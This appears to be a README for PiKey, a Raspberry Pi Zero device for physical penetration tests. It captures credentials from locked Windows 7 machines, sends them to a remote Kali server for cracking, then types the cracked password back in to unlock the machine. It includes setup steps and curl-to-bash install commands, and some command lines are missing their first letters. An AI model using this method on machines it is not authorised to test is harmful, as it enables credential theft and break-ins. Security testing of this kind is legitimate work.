PiKey is Physical Penetration Testing device used for the extraction and reuse of credentials on locked Microsoft Windows 7 systems. It is designed to work against corporate domain-joined machines, but may also work against home machines.
Based on the Raspberry Pi Zero W, the PiKey builds upon the Credential stealing attacks by Mubix in 2016 (https://room362.com/post/2016/snagging-creds-from-locked-machines/) and attempts to use stolen credentials to unlock machines. It typically takes one to three minutes to unlock a machine.
The PiKey is due to be demonstrated at the BSidesLondon 2017 conference, a video of it in action can be found below.
When first inserted into a machine, the PiKey emulates a known network adaptor (so all Windows 7 machines should load drivers for it without needing to download from Windows Update). Windows then prioritises this interface over any pre-existing ones, meaning it starts to send traffic through it. This then allows the device to use the amazing Responder to capture credentials.
Once credentials have been obtained, the PiKey sends them off to a remote server to perform password cracking against them. If credentials are cracked then the cleartext versions of those credentials are then sent back to the PiKey.
The PiKey then removes the network adaptor emulation and starts to emulate a HID Keyboard. The cleartext credentials are then typed back into the machine, thus unlocking it.
The following hardware is required for the PiKey to work
The following software is required for the PiKey to work
Once the PiKey and Kali Linux have been setup correctly, the following process can be used to use the PiKey:
Setup of the PiKey is broken into two stages, the client (PiKey device) and the server (Kali Linux). Setup of the client should be completed first and then the server second, as the SSH keys used for secure communication will be created on the PiKey and then the public key should be pasted into the server.
Download the latest version of Jessie Lite (https://downloads.raspberrypi.org/raspbian_lite_latest)
Follow the guidance here for step by step installation (https://www.raspberrypi.org/documentation/installation/installing-images/README.md) …but in short:
Plug the MicroSD card into your Pi Zero. It also makes sense at this point to plug in a monitor and a keyboard. Apply some power and wait for it to boot.
Login with username: pi and password: raspberry
Now is a good time to connect to your wifi so you can download the rest of the pre-requisites. Steps for connecting to Wifi for the non-Linux savy amoung us are below.
Edit the network interfaces file
udo nano /etc/network/interfaces
Find the entry for wlan0 and modifiy it with the text below. If it isn't there, then add the following to the bottom of the file (Ctrl+X) to exit
llow-hotplug wlan0
face wlan0 inet dhcp
wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf
metric 10
Edit the wpa_supplicant file
udo nano /etc/wpa_supplicant/wpa_supplicant.conf
Add the following to the bottom of the file (Ctrl+X) to exit
etwork={
ssid="your network name"
psk="your network key"
key_mgmt=WPA-PSK
At this point you can do the following to verify it connects to your Wifi ok.
udo ifdown wlan0
udo ifup wlan0
!!NOTE!! - After the intial install, it might be wise to change these setting to a wifi hotspot on your phone or similar, as this is typically what you will use away from home. If you forget this step, then no hashes will get cracked!!
Configure SSH to startup on boot:
udo touch /boot/ssh
Reboot (with the screen connected as this will print the DHCP IP address for the wireless adapter). Log back in via SSH.
Run the setup script as the non-root user.
ash <(curl -s https://raw.githubusercontent.com/SecurityJon/PiKey/master/client/install.sh)
When prompted with the public key, wait until the Server has been built to reboot the device, as you'll need to paste this into the server setup script.
Get a copy of Kali Linux up and running, with internet connectivity and port 22 forwarded from the internet
Make note of the URL/IP address of the internet facing side of the device
Run the setup script as root (or a user with sudo permissions)
ash <(curl -s https://raw.githubusercontent.com/SecurityJon/PiKey/master/server/install.sh)
All hashes captured by the Server can be seen with the following command:
at /home/pikeyuser/PiKey/PiKey_CapturedHashes.txt
During the setup process the PiKey creates a set of Public/Private keys. The private key is always kept on the PiKey and the public key is copied into the server setup script. All credentials passed between PiKey and Server are passed through a SSH connection between the two components which is protectecd by those keys
Within the Server setup script a line is inserted into the authorized_keys file for the PiKey user which prevents any commands being run on the server apart from password cracking of passed credentials
The PiKey itself doesn't store any obtained or cracked credentials on it, so if it is lost or taken the credentials won't be exposed to risk. The server however stores all of the credentials passed to it, so even if they're not cracked during an engagement they can be attacked again at a later date.
PiKey Created by Jon Aubrey (@SecurityJon) and Trevor Shingles (@_tshingles), 2017
This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
Thanks for the following individuals for help on this project:
Mark Stone for the great name
James Parish for the inital PiKey logo